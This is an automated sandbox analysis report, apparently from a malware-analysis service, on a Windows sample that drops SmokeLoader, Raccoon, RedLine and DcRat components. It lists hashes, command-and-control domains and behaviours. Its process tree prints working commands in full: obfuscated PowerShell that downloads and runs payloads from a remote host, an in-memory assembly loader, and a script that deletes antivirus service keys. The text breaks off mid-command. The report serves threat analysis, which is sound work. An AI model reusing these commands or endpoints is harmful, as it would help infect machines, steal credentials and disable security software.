Analysis
-
max time kernel
129s -
max time network
163s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-08-2021 17:31
Static task
static1
Behavioral task
behavioral1
Sample
89c3336ea6ed1ad75668c067912e7305.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
89c3336ea6ed1ad75668c067912e7305.exe
Resource
win10v20210408
General
-
Target
89c3336ea6ed1ad75668c067912e7305.exe
-
Size
319KB
-
MD5
89c3336ea6ed1ad75668c067912e7305
-
SHA1
2de13b667bbca2e1f0f4477007a644c09a86e533
-
SHA256
aaa3cda8d3f4bc7ff94a3e4f0fd37aced9d484b663bc15f198e6e25482f60443
-
SHA512
10226b86087eeb0d2b878fcec69b5fae7dc28ba16260cf5bc31cfb6af1f2c2ddcbcadca3c9fea5a4fcdbf983e00a734c746e0ae9a1b3ea424c1bd921198faa28
Malware Config
Extracted
https://www.rockonwest.best/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected phishing page
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 2628 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3292 2628 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 2628 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 2628 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2224 2628 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3880 2628 schtasks.exe -
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2172-169-0x0000000000BF0000-0x0000000000C81000-memory.dmp family_raccoon behavioral2/memory/2172-170-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon behavioral2/memory/4708-282-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/4708-283-0x000000000044003F-mapping.dmp family_raccoon behavioral2/memory/4708-285-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\E556.exe dcrat C:\Users\Admin\AppData\Local\Temp\E556.exe dcrat C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe dcrat C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe dcrat C:\Windows\System32\msaudite\dwm.exe dcrat C:\Windows\System32\msaudite\dwm.exe dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1004 4484 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
Processes:
E38F.exeE556.exeE864.exeEAC6.exeRuntimebroker.exeF97D.exeFE6F.exereviewbrokercrtCommonsessionperfDll.exeRuntimebroker_new.exeRuntimebroker.exedwm.exeEAC6.exepid process 192 E38F.exe 2952 E556.exe 1104 E864.exe 3640 EAC6.exe 2072 Runtimebroker.exe 1128 F97D.exe 2172 FE6F.exe 4060 reviewbrokercrtCommonsessionperfDll.exe 2324 Runtimebroker_new.exe 3028 Runtimebroker.exe 4280 dwm.exe 4708 EAC6.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
F97D.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F97D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F97D.exe -
Deletes itself 1 IoCs
Processes:
pid process 3016 -
Drops startup file 3 IoCs
Processes:
cmd.exeRuntimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 6 IoCs
Processes:
FE6F.exeEAC6.exepid process 2172 FE6F.exe 2172 FE6F.exe 2172 FE6F.exe 2172 FE6F.exe 2172 FE6F.exe 4708 EAC6.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\F97D.exe themida C:\Users\Admin\AppData\Local\Temp\F97D.exe themida behavioral2/memory/1128-154-0x0000000000F50000-0x0000000000F51000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Windows\\System32\\MPG4DECD\\sihost.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\msaudite\\dwm.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Boot\\et-EE\\OfficeClickToRun.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewbrokercrtCommonsessionperfDll = "\"C:\\reviewbrokercrtCommon\\kB5VrhbV\\reviewbrokercrtCommonsessionperfDll.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('https://www.rockonwest.best/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Documents and Settings\\sppsvc.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\AppxBlockMap\\ShellExperienceHost.exe\"" reviewbrokercrtCommonsessionperfDll.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
F97D.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F97D.exe -
Drops file in System32 directory 4 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exedescription ioc process File created C:\Windows\System32\msaudite\6cb0b6c459d5d3455a3da700e713f2e2529862ff reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\MPG4DECD\sihost.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\MPG4DECD\66fc9ff0ee96c2b21f0cfded48750ae9e3032bf3 reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\msaudite\dwm.exe reviewbrokercrtCommonsessionperfDll.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
F97D.exepid process 1128 F97D.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
89c3336ea6ed1ad75668c067912e7305.exeEAC6.exedescription pid process target process PID 3260 set thread context of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3640 set thread context of 4708 3640 EAC6.exe EAC6.exe -
Drops file in Windows directory 2 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exedescription ioc process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\f8c8f1285d826bc63910aaf97db97186ba642b4f reviewbrokercrtCommonsessionperfDll.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5108 4708 WerFault.exe EAC6.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
89c3336ea6ed1ad75668c067912e7305.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 89c3336ea6ed1ad75668c067912e7305.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 89c3336ea6ed1ad75668c067912e7305.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 89c3336ea6ed1ad75668c067912e7305.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1492 schtasks.exe 3292 schtasks.exe 4052 schtasks.exe 2248 schtasks.exe 2224 schtasks.exe 3880 schtasks.exe -
Modifies registry class 2 IoCs
Processes:
E556.exereviewbrokercrtCommonsessionperfDll.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings E556.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings reviewbrokercrtCommonsessionperfDll.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
89c3336ea6ed1ad75668c067912e7305.exepid process 2160 89c3336ea6ed1ad75668c067912e7305.exe 2160 89c3336ea6ed1ad75668c067912e7305.exe 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3016 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
89c3336ea6ed1ad75668c067912e7305.exepid process 2160 89c3336ea6ed1ad75668c067912e7305.exe 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 -
Suspicious use of AdjustPrivilegeToken 54 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exeF97D.exepowershell.exedwm.exepowershell.exeEAC6.exepowershell.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 4060 reviewbrokercrtCommonsessionperfDll.exe Token: SeDebugPrivilege 1128 F97D.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 4280 dwm.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 3640 EAC6.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeRestorePrivilege 5108 WerFault.exe Token: SeBackupPrivilege 5108 WerFault.exe Token: SeDebugPrivilege 5108 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3016 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
89c3336ea6ed1ad75668c067912e7305.exeE556.exeE38F.exeWScript.execmd.exeE864.exeRuntimebroker.exeRuntimebroker_new.exedescription pid process target process PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3260 wrote to memory of 2160 3260 89c3336ea6ed1ad75668c067912e7305.exe 89c3336ea6ed1ad75668c067912e7305.exe PID 3016 wrote to memory of 192 3016 E38F.exe PID 3016 wrote to memory of 192 3016 E38F.exe PID 3016 wrote to memory of 192 3016 E38F.exe PID 3016 wrote to memory of 2952 3016 E556.exe PID 3016 wrote to memory of 2952 3016 E556.exe PID 3016 wrote to memory of 2952 3016 E556.exe PID 3016 wrote to memory of 1104 3016 E864.exe PID 3016 wrote to memory of 1104 3016 E864.exe PID 3016 wrote to memory of 1104 3016 E864.exe PID 3016 wrote to memory of 3640 3016 EAC6.exe PID 3016 wrote to memory of 3640 3016 EAC6.exe PID 3016 wrote to memory of 3640 3016 EAC6.exe PID 2952 wrote to memory of 3880 2952 E556.exe WScript.exe PID 2952 wrote to memory of 3880 2952 E556.exe WScript.exe PID 2952 wrote to memory of 3880 2952 E556.exe WScript.exe PID 192 wrote to memory of 2072 192 E38F.exe Runtimebroker.exe PID 192 wrote to memory of 2072 192 E38F.exe Runtimebroker.exe PID 192 wrote to memory of 2072 192 E38F.exe Runtimebroker.exe PID 3016 wrote to memory of 1128 3016 F97D.exe PID 3016 wrote to memory of 1128 3016 F97D.exe PID 3016 wrote to memory of 1128 3016 F97D.exe PID 3016 wrote to memory of 2172 3016 FE6F.exe PID 3016 wrote to memory of 2172 3016 FE6F.exe PID 3016 wrote to memory of 2172 3016 FE6F.exe PID 3016 wrote to memory of 1628 3016 explorer.exe PID 3016 wrote to memory of 1628 3016 explorer.exe PID 3016 wrote to memory of 1628 3016 explorer.exe PID 3016 wrote to memory of 1628 3016 explorer.exe PID 3880 wrote to memory of 2848 3880 WScript.exe cmd.exe PID 3880 wrote to memory of 2848 3880 WScript.exe cmd.exe PID 3880 wrote to memory of 2848 3880 WScript.exe cmd.exe PID 3016 wrote to memory of 188 3016 explorer.exe PID 3016 wrote to memory of 188 3016 explorer.exe PID 3016 wrote to memory of 188 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 2848 wrote to memory of 4060 2848 cmd.exe reviewbrokercrtCommonsessionperfDll.exe PID 2848 wrote to memory of 4060 2848 cmd.exe reviewbrokercrtCommonsessionperfDll.exe PID 1104 wrote to memory of 1540 1104 E864.exe cmd.exe PID 1104 wrote to memory of 1540 1104 E864.exe cmd.exe PID 1104 wrote to memory of 1540 1104 E864.exe cmd.exe PID 3016 wrote to memory of 1256 3016 explorer.exe PID 3016 wrote to memory of 1256 3016 explorer.exe PID 3016 wrote to memory of 1256 3016 explorer.exe PID 3016 wrote to memory of 2220 3016 explorer.exe PID 3016 wrote to memory of 2220 3016 explorer.exe PID 3016 wrote to memory of 2220 3016 explorer.exe PID 3016 wrote to memory of 2220 3016 explorer.exe PID 2072 wrote to memory of 2324 2072 Runtimebroker.exe Runtimebroker_new.exe PID 2072 wrote to memory of 2324 2072 Runtimebroker.exe Runtimebroker_new.exe PID 2072 wrote to memory of 2324 2072 Runtimebroker.exe Runtimebroker_new.exe PID 3016 wrote to memory of 508 3016 explorer.exe PID 3016 wrote to memory of 508 3016 explorer.exe PID 3016 wrote to memory of 508 3016 explorer.exe PID 2324 wrote to memory of 3028 2324 Runtimebroker_new.exe Runtimebroker.exe PID 2324 wrote to memory of 3028 2324 Runtimebroker_new.exe Runtimebroker.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"C:\Users\Admin\AppData\Local\Temp\89c3336ea6ed1ad75668c067912e7305.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\E38F.exeC:\Users\Admin\AppData\Local\Temp\E38F.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker_new.exe"C:\ProgramData\Runtimebroker_new.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"4⤵
- Executes dropped EXE
- Drops startup file
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''https://www.rockonwest.best/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'5⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('https://www.rockonwest.best/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d 